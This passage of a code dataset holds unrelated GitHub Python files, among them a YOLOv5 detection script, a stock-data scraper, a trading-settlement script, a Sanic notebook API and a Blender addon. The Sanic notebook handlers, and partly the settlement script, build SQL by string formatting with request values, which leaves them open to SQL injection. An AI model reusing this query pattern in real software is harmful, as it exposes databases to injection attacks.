utils.augmentations import letterbox\nfrom utils.general import LOGGER, non_max_suppression, scale_coords\nfrom utils.plots import Annotator, colors\n\n\ndef initialize_model(weights, device):\n model = DetectMultiBackend(weights, device=device, dnn=False)\n return model\n\ndef initialize_reader(source):\n if source == '0':\n source = int(source)\n cap = cv2.VideoCapture(source)\n else:\n cap = cv2.VideoCapture(source)\n return cap\n\n\ndef initialize_writer():\n pass\n\n\ndef get_frame(reader):\n for i in range(10):\n reader.read()\n ret, img = reader.read()\n return ret, img\n\ndef prepare_frame(frame, imgsz, device):\n im0s = [frame.copy()]\n \n im = [letterbox(x, imgsz, stride=32, auto=True)[0] for x in im0s]\n\n # Stack\n im = np.stack(im, 0)\n\n # Convert\n im = im[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW\n im = np.ascontiguousarray(im)\n im = torch.from_numpy(im).to(device)\n im = im.float() # uint8 to fp16/32\n im /= 255 # 0 - 255 to 0.0 - 1.0\n if len(im.shape) == 3:\n im = im[None] # expand for batch dim\n return im\n\ndef definition_of_predictions(model, im, imgsz):\n model.warmup(imgsz=(1, 3, imgsz), half=False) # warmup\n # Inference\n pred = model(im, augment=False, visualize=False)\n\n # NMS\n pred = non_max_suppression(pred, conf_thres=0.25, iou_thres=0.45, classes=None, max_det=100)\n print(pred)\n return pred\n\n\ndef show_result(model, view_img, source, im, frame, pred):\n names = model.names\n path = source\n im = im\n im0s = [frame.copy()]\n s = ''\n\n # Process predictions\n for i, det in enumerate(pred): # per image\n if source == '0': # batch_size >= 1\n p, im0 = path[i], im0s[i].copy()\n s += f'{i}: '\n else:\n p, im0 = path, im0s.copy()\n\n p = Path(p) # to Path\n s += '%gx%g ' % im.shape[2:] # print string\n annotator = Annotator(im0, line_width=3, example=str(names))\n if len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(im.shape[2:], det[:, :4], im0.shape).round()\n\n # Print results\n for c in det[:, -1].unique():\n n = (det[:, -1] == c).sum() # detections per class\n s += f\"{n} {names[int(c)]}{'s' * (n > 1)}, \" # add to string\n\n # Write results\n for *xyxy, conf, cls in reversed(det):\n if view_img: # Add bbox to image\n c = int(cls) # integer class\n label = (f'{names[c]} {conf:.2f}')\n annotator.box_label(xyxy, label, color=colors(c, True))\n # Print time (inference-only)\n LOGGER.info(f'{s}Done.')\n\n # Stream results\n im0 = annotator.result()\n if view_img:\n cv2.imshow(str(p), im0)\n cv2.waitKey(1) # 1 millisecond\n\n\ndef main(source, device, weights, view_img, imgsz):\n model = initialize_model(weights, device)\n reader = initialize_reader(source)\n # writer = initialize_writer(...params...) 
// This one isn't really needed, but can be kept.\n\n    while True:\n        ret, frame = get_frame(reader)\n        if not ret:\n            break\n        im = prepare_frame(frame, imgsz, device)\n        pred = definition_of_predictions(model, im, imgsz)\n        show_result(model, view_img, source, im, frame, pred)\n\nif __name__ == \"__main__\":\n    source='0'\n    device='cpu'\n    weights='yolov5s.pt'\n    view_img=True\n    imgsz=640 \n    main(source, device, weights, view_img, imgsz)","repo_name":"stekloplastik/Yolov5Test","sub_path":"my_detect3.py","file_name":"my_detect3.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43183972377","text":"from io import StringIO\nimport requests\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport bs4\nimport csv\nimport os\n\nsession = requests.session()\n\nheaders = {\n    \"user-agent\": \"Chrome/87.0.4280.88\"\n}\nhead = {\n    'user-agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n                  \"Chrome/87.0.4280.88 Safari/537.36 \"\n}\n\ndef getDataSpecifyDate(company, from_date=(datetime.today().strftime(\"%d-%m-%Y\")), to=(datetime(datetime.today().year - 1, datetime.today().month,datetime.today().day).strftime(\"%d-%m-%Y\"))):\n    session.get(\"https://www.nseindia.com\", headers=head)\n    session.get(\"https://www.nseindia.com/get-quotes/equity?symbol=\" + company, headers=head)\n    session.get(\"https://www.nseindia.com/api/historical/cm/equity?symbol=\" + company, headers=head)\n    url = \"https://www.nseindia.com/api/historical/cm/equity?symbol=\" + company + \"&series=[%22EQ%22]&from=\" + from_date + \"&to=\" + to + \"&csv=true\"\n    data = session.get(url=url, headers=head)\n    df = pd.read_csv(StringIO(data.text[3:]))\n    return df\n\n\n\ndef getDataOfOneYear(varient, from_date = ((datetime(datetime.today().year - 1, datetime.today().month, datetime.today().day) + timedelta(days=2)).strftime(\"%d-%m-%Y\")), to_date =(datetime.today().strftime(\"%d-%m-%Y\"))):\n    varient = varient.upper()\n    varient = varient.replace(' ', '%20')\n    varient = varient.replace('-', '%20')\n    url=\"https://www1.nseindia.com/products/dynaContent/equities/indices/historicalindices.jsp?indexType=\" + varient + \"&fromDate=\" + from_date + \"&toDate=\" + to_date\n    data = session.get(url=url, headers=head)\n    soup = bs4.BeautifulSoup(data.text, 'html5lib')\n    df = pd.read_csv(StringIO(soup.find('div', {'id': 'csvContentDiv'}).contents[0].replace(':','\\n')))\n    return df\n\ndef makeDataset(url):\n    with open(\"dataset.csv\", \"w\") as f:\n        f.write(session.get(url).text)\n\n    with open(\"dataset.csv\", \"r\") as f:\n        dataset = csv.reader(f)\n        niftyData = []\n        stockData = []\n\n        for idx, row in enumerate(dataset):\n            if 8 <= idx <= 72:\n                niftyData.append(row)\n            if 126 <= idx:\n                stockData.append(row)\n    os.remove(\"dataset.csv\")\n    return pd.DataFrame(niftyData), pd.DataFrame(stockData)\n\n\n\ndef getTodayData() -> object:\n    data = session.get(url=\"https://www.nseindia.com/api/merged-daily-reports?key=favCapital\", headers=headers)\n    return makeDataset(data.json()[1]['link'])\n\n\n# nifty_data, companies_data = getTodayData()\n# print(nifty_data.tail())\n# print(companies_data.tail())","repo_name":"ankitasuman009/data-engg-work","sub_path":"nse_scarping/getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30354291686","text":"# -*- coding: utf-8 -*-\nimport os\nimport 
sys\n\npath = os.path.abspath(os.path.join(os.path.dirname(__file__)))\nsys.path.append(path)\nfrom .sendmail import send_mail\nimport logging\nimport datetime as dt\nimport pandas as pd\nfrom WindPy import *\nimport mysql.connector\n\ncolumn = [\n 'account',\n 'settle_date',\n 'intraday_seq',\n 'contract',\n 'dir',\n 'quantity',\n 'open_strategy',\n 'open_order_time',\n 'open_deal_time',\n 'open_trigger_price',\n 'open_order_price',\n 'open_deal_price',\n 'mul',\n 'closed_price',\n 'profit']\n\n\n########################################################################################################################\nclass HoldingPositionProfit:\n def __init__(self):\n self.cnx = None\n return\n\n # ------------------------------------------------------------------------------------------------------------------\n def __del__(self):\n self.cnx.close()\n self.cnx_info.close()\n self.cnx_price.close()\n\n # ------------------------------------------------------------------------------------------------------------------\n def connect(self, settle_info):\n self.cnx = mysql.connector.connect(user=settle_info.dbase_acc,\n password=settle_info.dbase_pw,\n host=settle_info.dbase_ip,\n port=settle_info.port,\n database=settle_info.database_name)\n\n self.cnx_info = mysql.connector.connect(user=settle_info.contract_dbase_acc,\n password=settle_info.contract_dbase_pw,\n host=settle_info.contract_dbase_ip,\n port=settle_info.contract_port,\n database=settle_info.contract_database_name)\n\n self.cnx_price = mysql.connector.connect(user=settle_info.tick_dbase_acc,\n password=settle_info.tick_dbase_pw,\n host=settle_info.tick_dbase_ip,\n port=settle_info.tick_port,\n database=settle_info.tick_database_name)\n\n # ------------------------------------------------------------------------------------------------------------------\n def get_holding_position(self, settle_date, intraday_seq):\n cursor = self.cnx.cursor(cursor_class=mysql.connector.cursor.MySQLCursorDict)\n query = (\"SELECT * FROM holding_positions \"\n \"where \"\n \"settle_date = '%s' \"\n \"and \"\n \"intraday_seq = %s\" % (settle_date, intraday_seq))\n cursor.execute(query)\n data = list(cursor)\n\n return data\n\n # ------------------------------------------------------------------------------------------------------------------\n def get_volume_multiple(self, contract, TradingDay):\n cursor = self.cnx_info.cursor()\n query = (\"select VolumeMultiple from codetable \"\n \"where \"\n \"TradingDay = '{last_date}' \"\n \"and \"\n \"InstrumentID = '{contract}'\".format(last_date=TradingDay, contract=contract)\n )\n cursor.execute(query)\n volume_multiple = list(cursor)[0][0]\n\n return volume_multiple\n\n # ------------------------------------------------------------------------------------------------------------------\n def get_close_price(self, contract, settle_date, closed_time):\n cursor = self.cnx_price.cursor()\n query = (\"select max(datetime) from {contract} \"\n \"where \"\n \"datetime < '{settle_date} {closed_time}'\".format(contract=contract,\n settle_date=settle_date,\n closed_time=closed_time)\n )\n cursor.execute(query)\n last_datetime = list(cursor)[0][0]\n\n query = (\"select last_price from {contract} \"\n \"where \"\n \"datetime = '{last_datetime}'\".format(contract=contract, last_datetime=last_datetime)\n )\n cursor.execute(query)\n last_price = list(cursor)[0][0]\n\n return last_price\n\n\n# ----------------------------------------------------------------------------------------------------------------------\ndef 
holding_position_mysql_profit(settle_info):\n hpp = HoldingPositionProfit()\n hpp.connect(settle_info)\n\n settle_date = settle_info.settle_date\n is_daytime = settle_info.is_daytime\n closed_date = settle_info.closed_date\n holding_profit_folder = settle_info.holding_profit_folder\n TradingDay = settle_date.strftime(\"%Y%m%d\")\n\n if is_daytime is True:\n intraday_seq = '0900'\n closed_time = '15:00:00'\n elif is_daytime is False:\n intraday_seq = '2100'\n closed_time = '02:30:00'\n elif is_daytime is None:\n intraday_seq = '0'\n closed_time = '15:00:00'\n else:\n raise Exception('unrecognized intraday section parameter')\n\n holding_positions = hpp.get_holding_position(settle_date, intraday_seq)\n\n holding_profit_data = list()\n for i, piece in enumerate(holding_positions):\n contract = str(piece['contract'])\n open_price = int(piece['open_deal_price'])\n direction = int(piece['dir'])\n quantity = int(piece['quantity'])\n open_strategy = str(piece['open_strategy'])\n\n volume_multiple = hpp.get_volume_multiple(contract, TradingDay)\n close_price = hpp.get_close_price(contract, closed_date, closed_time)\n\n if not type(close_price) == float:\n close_price = 0\n\n net_profit = (close_price - open_price) * direction * quantity * volume_multiple\n\n holding_profit_data.append(\n [piece['account'],\n piece['settle_date'],\n piece['intraday_seq'],\n piece['contract'],\n piece['dir'],\n piece['quantity'],\n piece['open_strategy'],\n piece['open_order_time'],\n piece['open_deal_time'],\n piece['open_trigger_price'],\n piece['open_order_price'],\n piece['open_deal_price'],\n volume_multiple,\n close_price,\n net_profit])\n\n # print(open_strategy, contract, piece['open_deal_price'], close_price, net_profit)\n\n holding_profit_file = 'holding_profit_%s_%s.csv' % (settle_date, intraday_seq)\n holding_path = os.path.join(holding_profit_folder, holding_profit_file)\n\n holding_profit_data = pd.DataFrame(holding_profit_data, columns=column)\n holding_profit_data.to_csv(holding_path, index=False)\n\n if settle_info.send_holding_mail is True:\n send_mail(holding_profit_file, holding_path, settle_info.mail_account, settle_info.mail_password, settle_info.to_mail)\n\n if os.path.exists(holding_path):\n return True\n else:\n return False\n","repo_name":"hong142101/ats_log_parser","sub_path":"ats_log_parser/check_and_settle/holding_profit_qxy.py","file_name":"holding_profit_qxy.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8674460025","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\n\n\n# the home page of the main website\ndef home_view(request):\n user = request.user\n hello = 'Hello,'\n\n #Shows different main page depends on different users\n context = {\n 'user': user,\n 'hello': hello,\n }\n\n return render(request,'main/home.html', context)\n # return HttpResponse(\"Hello world\")","repo_name":"ericlin1230/Image-Repository","sub_path":"shopifyChallenge/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28018836444","text":"from typing import List, Optional\n\nimport numpy as np\n\nfrom . 
import Rpc, ComSrvError\n\n\nclass SigrokDevice(object):\n    def __init__(self, addr, desc=None, rpc: Optional[Rpc] = None):\n        if rpc is None:\n            rpc = Rpc.make_default()\n        self._addr = addr\n        self._desc = desc\n        self._rpc = rpc\n\n    @property\n    def description(self):\n        return self._desc\n\n    @property\n    def address(self):\n        return self._addr\n\n    async def read(\n        self,\n        channels: Optional[List[str]] = None,\n        samplerate=48e6,\n        num_samples=None,\n        time=None,\n    ):\n        if time is not None and num_samples is not None:\n            raise ValueError(\"Specify only one of time or num_samples\")\n        if time is not None:\n            acquire = {\"Time\": float(time)}\n        elif num_samples is not None:\n            acquire = {\"Samples\": int(num_samples)}\n        else:\n            raise ValueError(\"Neither time nor num_samples is given\")\n        if channels is None:\n            channels = []\n        request = {\n            \"Sigrok\": {\n                \"instrument\": {\"address\": self._addr},\n                \"request\": {\n                    \"channels\": channels,\n                    \"sample_rate\": int(samplerate),\n                    \"acquire\": acquire,\n                },\n            }\n        }\n        data = await self._rpc.get(request)\n        ComSrvError.check_raise(data)\n        data = data[\"Sigrok\"][\"Data\"]\n        tsample = data[\"tsample\"]\n        length = data[\"length\"]\n        t = np.arange(0, length) * tsample\n        ret = {}\n        for (k, v) in data[\"channels\"].items():\n            base = np.array(v, dtype=np.uint8)\n            ret[k] = np.unpackbits(base, count=length, bitorder=\"little\")\n        return t, ret\n\n\nasync def list_devices(rpc: Optional[Rpc] = None) -> List[SigrokDevice]:\n    if rpc is None:\n        rpc = Rpc.make_default()\n    ret = await rpc.get({\"ListSigrokDevices\": None})\n    ComSrvError.check_raise(ret)\n    devices = ret[\"Sigrok\"][\"Devices\"]\n    ret = []\n    for dev in devices:\n        ret.append(SigrokDevice(dev[\"addr\"], desc=dev[\"desc\"], rpc=rpc))\n    return ret\n","repo_name":"raffber/comsrv","sub_path":"python/comsrv/sigrok.py","file_name":"sigrok.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9722944013","text":"import numpy as np\nfrom Law import Law\nfrom Teacher1 import Teacher1\nfrom Teacher2 import Teacher2\nfrom Teacher3 import Teacher3\nfrom Teacher4 import Teacher4\nfrom random import randint\nfrom tqdm import tqdm\n\n\nclass feedbackModel:\n\n    def __init__(self, output_file_name=\"output.txt\", optimized=False):\n\n        self.default_explanation = None\n        self.default_label = None\n        self.laws = []  # list of laws \n        self.teacher = None\n        self.num_of_mistakes = 0\n        self.mistakes_made = []\n        self.output_file_name = output_file_name\n        self.f = None\n        self.optimized = optimized\n\n    def fit(self, X, y, teacher_type=1):\n        # open output file\n        self.f = open(self.output_file_name, \"a\")\n        self.f.truncate(0)  # erase the contents of the file if it already existed\n\n        # shuffle the data\n        indexes = np.arange(y.shape[0])\n        np.random.shuffle(indexes)\n        shuffled_X = X[indexes]\n        shuffled_y = y[indexes]\n\n        teacher_types = {1: Teacher1, 2: Teacher2, 3: Teacher3, 4: Teacher4}\n        if teacher_type not in teacher_types:\n            raise ValueError(\"Invalid teacher_type value\")\n\n        # initialize teacher\n        self.teacher = teacher_types[teacher_type](shuffled_X, shuffled_y)\n\n        # get processed data from teacher\n        preprocessed_data = self.teacher.get_preprocessed_data()\n\n        # initialize default label and explanation\n        i = randint(0, preprocessed_data.shape[0] - 1)  # randomly select an index\n        self.default_label = shuffled_y[i]\n        self.default_explanation = preprocessed_data[i]\n\n        # initialize prediction list for debugging purposes\n        prediction_list = 
[]\n\n self.f.write(\"-------------------- training --------------------\\n\\n\")\n for features in tqdm(preprocessed_data):\n\n # predict\n if self.optimized:\n prediction, explanation, law = self.__predict2(features)\n else:\n prediction, explanation, law = self.__predict(features)\n\n # get true label and discriminative feature from teacher\n true_label, discriminative_feature = self.teacher.teach(features, explanation, prediction)\n self.f.write(\"\\n-------------------- curr iteration information --------------------\\n\")\n self.f.write(f\"the example: {features}\\n\"\n f\"predicted: {prediction}, with the explanation of\\n{explanation}\\n\"\n f\"the teacher response is: {true_label} with {discriminative_feature} as discriminative feature\\n\")\n\n # in case the algorithm prediction was wrong\n if prediction != true_label:\n self.num_of_mistakes += 1\n if law is None:\n # create new law\n new_law = Law(features, true_label, discriminative_feature)\n self.laws.append(new_law)\n\n else:\n # update the law\n discriminative_feature[:, 1] = 1 - discriminative_feature[:, 1]\n law.updateFeatures(discriminative_feature)\n\n # for generating the graph\n self.mistakes_made.append(self.num_of_mistakes)\n prediction_list.append(prediction)\n\n examples_seen, percent_mistakes = self.plotAndPrint(prediction_list, y)\n\n # close the output file\n self.f.close()\n\n return examples_seen, percent_mistakes\n\n def plotAndPrint(self, prediction_list, y):\n self.f.write(\"\\n-------------------- printing the final decision list --------------------\\n\")\n for p, l in zip(prediction_list, y):\n answer = \"RIGHT\" if p == l else \"WRONG\"\n self.f.write(f\"prediction: {p},\\ttrue label: {l}\\t--> {answer}\\n\")\n\n num_of_example = y.shape[0]\n self.f.write(f\"\\npercentage of mistake on the entire data set: {self.num_of_mistakes} / {num_of_example} =\"\n f\" {(self.num_of_mistakes / num_of_example) * 100}%\")\n\n examples_seen = [i + 1 for i in range(num_of_example)]\n\n # calculate the percentage of mistakes made\n percent_mistakes = [(m / e) * 100 for m, e in zip(self.mistakes_made, examples_seen)]\n\n return examples_seen, percent_mistakes\n\n def __predict(self, features):\n for law in self.laws:\n if law.isFitting(features):\n prediction = law.getLabel()\n explanation = law.getExplanation()\n\n return prediction, explanation, law\n\n return self.default_label, self.default_explanation, None\n\n # instead of the default label, we predict based on the closest law\n def __predict2(self, features):\n closest_pred = self.default_label\n closest_expl = self.default_explanation\n max_num_of_matching_dfs = 0 # max number of discriminative features of a law that matched our features\n for law in self.laws:\n prediction = law.getLabel()\n explanation = law.getExplanation()\n\n if law.isFitting(features):\n return prediction, explanation, law\n\n num_of_matching_dfs = law.numOfMatchingFeatures(features)\n if num_of_matching_dfs > max_num_of_matching_dfs:\n max_num_of_matching_dfs = num_of_matching_dfs\n closest_pred = prediction\n closest_expl = explanation\n\n return closest_pred, closest_expl, None\n","repo_name":"nivyosef12/Data-Analysis-Learning-with-Explanations","sub_path":"feedbackModel.py","file_name":"feedbackModel.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9466183449","text":"# 5431. 
Checking Minseok's homework\n# Level D3\n# Site: https://swexpertacademy.com/main/code/problem/problemList.do\n\nT = int(input())\nfor tc in range(1, T + 1):\n    N, K = map(int, input().split())\n    students = list(map(int, input().split()))\n    visited = [0] * N\n    for s in students:\n        visited[s - 1] = 1\n\n    print(f'#{tc}', end=' ')\n    for i in range(len(visited)):\n        if not visited[i]:\n            print(i + 1, end=' ')\n    print()\n","repo_name":"Panseung/algo_python_2023","sub_path":"SWEA_D3/230620/5431.py","file_name":"5431.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15600384133","text":"from pyspark.sql import SparkSession\n\ndata = \"/examples/data.jsonl\"\nspark = SparkSession.builder.appName(\"App\").getOrCreate()\n\ndf = spark.read.json(data)\ndf.select(\"name\").write.csv('/spark-result/dataframe-select', header=True)\n\nspark.read.json(data).createOrReplaceTempView(\"table\")\nspark.sql(\"SELECT name FROM table\").write.csv('/spark-result/sql-select', header=True)\n\nspark.stop()","repo_name":"michalliss/pwr-pdzd","sub_path":"docker/master_volume/examples/spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4882380567","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport logging\nfrom sanic import Blueprint, response\nfrom sanic.response import json, text, html, redirect\nimport ujson\nimport datetime\n\nlogger = logging.getLogger('notebook')\nnotebook_bp = Blueprint('notebook', url_prefix='notebook')\n\n@notebook_bp.route('/get',methods=['GET'])\nasync def notebooks(request):\n    args = request.args\n    limit = args.get('limit',10)\n    start = args.get('start',0)\n    order = args.get('order','desc')\n    notebook_id = args.get('id',-1)\n\n    notebooks = []\n\n    author_id = request['session']['author_id'] if request['session']['author_id'] else -1\n\n    if author_id <0 :\n        return json({'error':'illegal information'}, status=400)\n\n    sql = \"\"\"select * from notebook where author_id = '%s' \"\"\" % author_id\n    if notebook_id >0:\n        sql = sql + \"\"\"and id=%s \"\"\" % notebook_id\n    sql = sql + \"\"\"order by id %s limit %s offset %s\"\"\" % (order,limit,start)\n\n    async with request.app.db.acquire() as cur:\n        try:\n            records = await cur.fetch(sql)\n            logger.info(sql)\n        except Exception as e:\n            logger.error(e)\n            return json({'error':'illegal information'}, status=400)\n\n    if records:\n        for record in records:\n            notebooks.append({\n                \"id\": record['id'],\n                \"name\": record['name'],\n            })\n    return json(notebooks)\n\n@notebook_bp.route('/post',methods=['POST'])\nasync def add_notebooks(request):\n    data = {}\n    try:\n        data = ujson.loads(request.body)\n    except:\n        return json({'error':'illegal information'},status=400)\n\n    author_id = request['session']['author_id'] if request['session']['author_id'] else -1\n    if author_id <0:\n        return json({'error':'illegal information'}, status=400)\n\n    sql = \"\"\"insert into notebook (name,author_id) values ('%s','%s') RETURNING id,name\"\"\" \\\n          %(data.get('name'), author_id)\n    print(sql)\n    async with request.app.db.acquire() as cur:\n        try:\n            res = await cur.fetch(sql)\n            logger.info(sql)\n        except Exception as e:\n            logger.error(e)\n            return json({'error':'service error'}, status=400)\n    return json({'success':'success', 'id':res[0]['id'], 'name':res[0]['name']}, status=200)\n\n@notebook_bp.route('/put',methods=['PUT'])\nasync def 
update_notebook(request):\n    data = {}\n    try:\n        data = ujson.loads(request.body)\n    except:\n        return json({'error':'illegal information'},status=400)\n\n    author_id = request['session']['author_id'] if request['session']['author_id'] else -1\n    if author_id <0:\n        return json({'error':'illegal information'}, status=400)\n    notebook_id = data.get(\"id\") if data.get(\"id\") else -1\n    if notebook_id<0:\n        return json({'error':'illegal information'},status=400)\n\n    sql = \"\"\"update notebook set name='%s', author_id='%s' where id=%s\"\"\" \\\n    %(data.get('name'),author_id,notebook_id)\n\n    async with request.app.db.acquire() as cur:\n        try:\n            await cur.fetch(sql)\n            logger.info(sql)\n        except Exception as e:\n            logger.error(e)\n            return json({'error':'service error'}, status=400)\n    return json({'success':'success'},status=200)\n\n@notebook_bp.route('/delete',methods=['DELETE'])\nasync def delete_notebook(request):\n    data = {}\n    try:\n        data = ujson.loads(request.body)\n    except:\n        return json({'error':'illegal information'},status=400)\n\n    author_id = request['session']['author_id'] if request['session']['author_id'] else -1\n    if author_id <0:\n        return json({'error':'illegal information'}, status=400)\n    notebook_id = data.get(\"id\") if data.get(\"id\") else -1\n    if notebook_id<0:\n        return json({'error':'illegal information'},status=400)\n\n    sql = \"\"\"delete from notebook where author_id='%s' and id=%s\"\"\"%(author_id,notebook_id)\n\n    async with request.app.db.acquire() as cur:\n        try:\n            await cur.fetch(sql)\n            logger.info(sql)\n        except Exception as e:\n            logger.error(e)\n            return json({'error':'service error'}, status=400)\n    return json({'success':'success'},status=200)\n","repo_name":"baojiweicn/susnote","sub_path":"app/views/notebook_view.py","file_name":"notebook_view.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"37"}
{"seq_id":"41898260068","text":"# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see <http://www.gnu.org/licenses/>.\nimport bpy\n\nbl_info = {\n \"name\" : \"PivotPainter2\",\n \"author\" : \"Lukas Reznicek, Jonathan Lindquist\",\n \"description\" : \"\",\n \"blender\" : (2, 80, 0),\n \"version\" : (0, 0, 1),\n \"location\" : \"\",\n \"warning\" : \"\",\n \"category\" : \"Generic\"\n}\n\n\n\nfrom .operators.operators import OBJECT_OT_lr_pivot_painter_export\nfrom bpy.props import IntProperty, CollectionProperty, StringProperty,FloatVectorProperty,BoolProperty,EnumProperty\n\n\ndef img1_alpha_callback(scene, context):\n painter2 = bpy.context.scene.pivot_painter_2\n\n items = []\n if painter2.image_1_rgb == 'OP0':\n items = []\n elif painter2.image_1_rgb == 'OP1' or painter2.image_1_rgb == 'OP2' or painter2.image_1_rgb == 'OP3': #LDR\n items.append(('OP1', 'Parent Index (Int as Float)',''))\n # items.append(('OP2', 'Number of Steps From Root',''))\n items.append(('OP3', 'Random 0-1 Value Per Element',''))\n # items.append(('OP4', 'Bounding Box Diameter',''))\n # items.append(('OP5', 'Selection Order (Int as Float)',''))\n items.append(('OP6', 'Normalized 0-1 Hierarchy position',''))\n # items.append(('OP7', 'Object X Width',''))\n # items.append(('OP8', 'Object Y Depth',''))\n # items.append(('OP9', 'Object Z Height',''))\n items.append(('OP10', 'Parent Index (Float - Up to 2048)',''))\n\n elif painter2.image_1_rgb == 'OP4' or painter2.image_1_rgb == 'OP5' or painter2.image_1_rgb == 'OP6': #HDR\n items.append(('OP6', 'Normalized 0-1 Hierarchy position',''))\n items.append(('OP3', 'Random 0-1 Value Per Element',''))\n items.append(('OP11', 'X Extent Divided by 2048 - 2048 Max',''))\n items.append(('OP12', 'Y Extent Divided by 2048 - 2048 Max',''))\n items.append(('OP13', 'Z Extent Divided by 2048 - 2048 Max',''))\n return items\n\n\ndef img2_alpha_callback(scene, context):\n painter2 = bpy.context.scene.pivot_painter_2\n\n items = []\n if painter2.image_2_rgb == 'OP0':\n items = []\n elif painter2.image_2_rgb == 'OP1' or painter2.image_2_rgb == 'OP2' or painter2.image_2_rgb == 'OP3': #LDR\n items.append(('OP1', 'Parent Index (Int as Float)',''))\n # items.append(('OP2', 'Number of Steps From Root',''))\n items.append(('OP3', 'Random 0-1 Value Per Element',''))\n # items.append(('OP4', 'Bounding Box Diameter',''))\n # items.append(('OP5', 'Selection Order (Int as Float)',''))\n items.append(('OP6', 'Normalized 0-1 Hierarchy position',''))\n # items.append(('OP7', 'Object X Width',''))\n # items.append(('OP8', 'Object Y Depth',''))\n # items.append(('OP9', 'Object Z Height',''))\n items.append(('OP10', 'Parent Index (Float - Up to 2048)',''))\n\n elif painter2.image_2_rgb == 'OP4' or painter2.image_2_rgb == 'OP5' or painter2.image_2_rgb == 'OP6': #HDR\n items.append(('OP11', 'X Extent Divided by 2048 - 2048 Max',''))\n items.append(('OP12', 'Y Extent Divided by 2048 - 2048 Max',''))\n items.append(('OP13', 'Z Extent Divided by 2048 - 2048 Max',''))\n items.append(('OP6', 'Normalized 0-1 Hierarchy position',''))\n items.append(('OP3', 'Random 0-1 Value Per Element',''))\n\n return items\n\n# Properties \n# To acess properties: bpy.data.scenes['Scene'].pivot_painter_2\n# Is assigned by pointer property below in class registration.\nclass pivot_painter2_settings(bpy.types.PropertyGroup):\n\n\n image_1_rgb:bpy.props.EnumProperty(name= 'RGB', description= '',default = 1, items= [\n ('OP0', 'Do Not Render',''),\n ('OP1', 'Pivot Position (16-bit)',''),\n #('OP2', 'Origin Position(16-bit)',''),\n #('OP3', 'Origin Extents(16-bit)',''),\n ('OP4', 'X Vector(8-bit)',''),\n 
('OP5', 'Y Vector(8-bit)',''),\n ('OP6', 'Z Vector(8-bit)','')])\n image_1_alpha:bpy.props.EnumProperty(name= 'Alpha', description= '', items= img1_alpha_callback)\n \n image_2_rgb:bpy.props.EnumProperty(name= 'RGB', description= '',default = 2, items= [\n ('OP0', 'Do Not Render',''),\n ('OP1', 'Pivot Position (16-bit)',''),\n #('OP2', 'Origin Position(16-bit)',''),\n #('OP3', 'Origin Extents(16-bit)',''),\n ('OP4', 'X Vector(8-bit)',''),\n ('OP5', 'Y Vector(8-bit)',''),\n ('OP6', 'Z Vector(8-bit)','')])\n\n\n image_2_alpha:bpy.props.EnumProperty(name= 'Alpha', description= '', items= img2_alpha_callback)\n\n export_name:bpy.props.StringProperty(name=\"Name\", description=\"Texture output base name. \\nUses active object name if empty\", default=\"\", maxlen=1024,)\n export_path:bpy.props.StringProperty(name=\"Folder\", description=\"Texture output location. \\n// = .blend file location\\n//..\\ = .blend file parent folder\", default=\"//\", maxlen=1024,subtype='DIR_PATH')\n uv_coordinate: bpy.props.IntProperty(name=\"Texture Coordinate\", description=\"Location of Pivot Painter custom UVs. Starts with 1\", default=2, min = 1, soft_max = 5)\n \n\n\n\nclass VIEW3D_PT_pivot_painter2(bpy.types.Panel):\n bl_label = \"Pivot Painter 2\"\n bl_idname = \"OBJECT_PT_pivot_painter2\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = 'PivotPainter2'\n\n\n def draw(self, context):\n\n pivot_painter_2 = context.scene.pivot_painter_2\n #myprops = bpy.context.scene['pivot_painter_2']\n\n layout = self.layout.box()\n layout.label(text=\"UVs\")\n\n row = layout.row(align=True)\n row.prop(pivot_painter_2, \"uv_coordinate\")\n\n\n\n #IMAGE 1 ----\n layout = self.layout.box()\n layout.label(text=\"Image 1\")\n\n row = layout.row(align=True)\n row.prop(pivot_painter_2, \"image_1_rgb\")\n row = layout.row(align=True)\n if pivot_painter_2.image_1_rgb != 'OP0': \n row.prop(pivot_painter_2, \"image_1_alpha\")\n\n\n #IMAGE 2 ----\n layout = self.layout.box()\n layout.label(text=\"Image 2\")\n\n row = layout.row(align=True)\n row.prop(pivot_painter_2, \"image_2_rgb\")\n row = layout.row(align=True)\n if pivot_painter_2.image_2_rgb != 'OP0': \n row.prop(pivot_painter_2, \"image_2_alpha\")\n\n\n\n\n\n 